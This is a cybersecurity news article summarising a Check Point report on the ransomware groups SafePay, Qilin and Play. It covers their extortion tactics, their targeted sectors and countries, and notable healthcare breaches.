The most prevalent and active ransomware group out there right now is SafePay, a gang first identified a mere seven months ago. According to cybersecurity firm Check Point, the group is possibly tied to Russian-affiliated threat actors.
-
The most prevalent and active ransomware group out there right now is SafePay, a gang first identified a mere seven months ago, according to cybersecurity firm Check Point.
-
The group employs aggressive negotiation tactics, including direct phone calls to victims, researchers add, and operates a “shame site” where stolen data from non-paying victims is published.
-
SafePay’s malware includes a Cyrillic-language exclusion, suggesting possible ties to Russian-affiliated threat actors.
In a new report, Check Point says SafePay has quickly established itself as a key player in the cybercrime ecosystem.
The group is very active and uses a double-extortion strategy, encrypting files while exfiltrating sensitive data to further pressure victims into paying ransoms.
The group employs aggressive negotiation tactics, including direct phone calls to victims, researchers add, and operates a “shame site” where stolen data from non-paying victims is published.
As per Check Point, SafePay has already listed over 200 victim organizations, with a distinct focus on German targets, which make up nearly one-fifth of its victims. This marks a clear deviation from typical global ransomware targeting trends.
“Notably, SafePay’s malware includes a Cyrillic-language exclusion, suggesting possible ties to Russian-affiliated threat actors,” the cybersecurity company adds.
It seems that the education sector remains a prime target for SafePay and other ransomware groups. However, these sophisticated, multi-stage campaigns also target the government, telecommunications, and healthcare sectors.
At the end of May, Security Affairs reported that North Carolina-based anatomic pathology lab Marlboro-Chesterfield Pathology had information from 236,000 patients compromised following a SafePay ransomware attack in mid-January.
Competing with SafePay is Qilin, a ransomware-as-a-service operation, first detected in July 2022 and known for targeting large enterprises and high-value organizations with a particular focus on the healthcare and education sectors.
Qilin – which is again linked to Russia – admitted in March it was responsible for the February 10th hack of a prestigious cancer treatment center in Japan, exposing the sensitive health information of 300,000 patients and leaving its hospital system “unusable.”
Another group trying to keep up is Play Ransomware, also referred to as PlayCrypt. This group has targeted a broad spectrum of businesses and critical infrastructure across North America, South America, and Europe, affecting approximately 300 entities by October 2023, Check Point says.
The report explains that Play Ransomware typically gains access to networks through compromised valid accounts or by exploiting unpatched vulnerabilities, such as those in Fortinet SSL VPNs.
Once inside, it employs techniques like using living-off-the-land binaries for tasks such as data exfiltration and credential theft.
Your email address will not be published. Required fields are markedmarked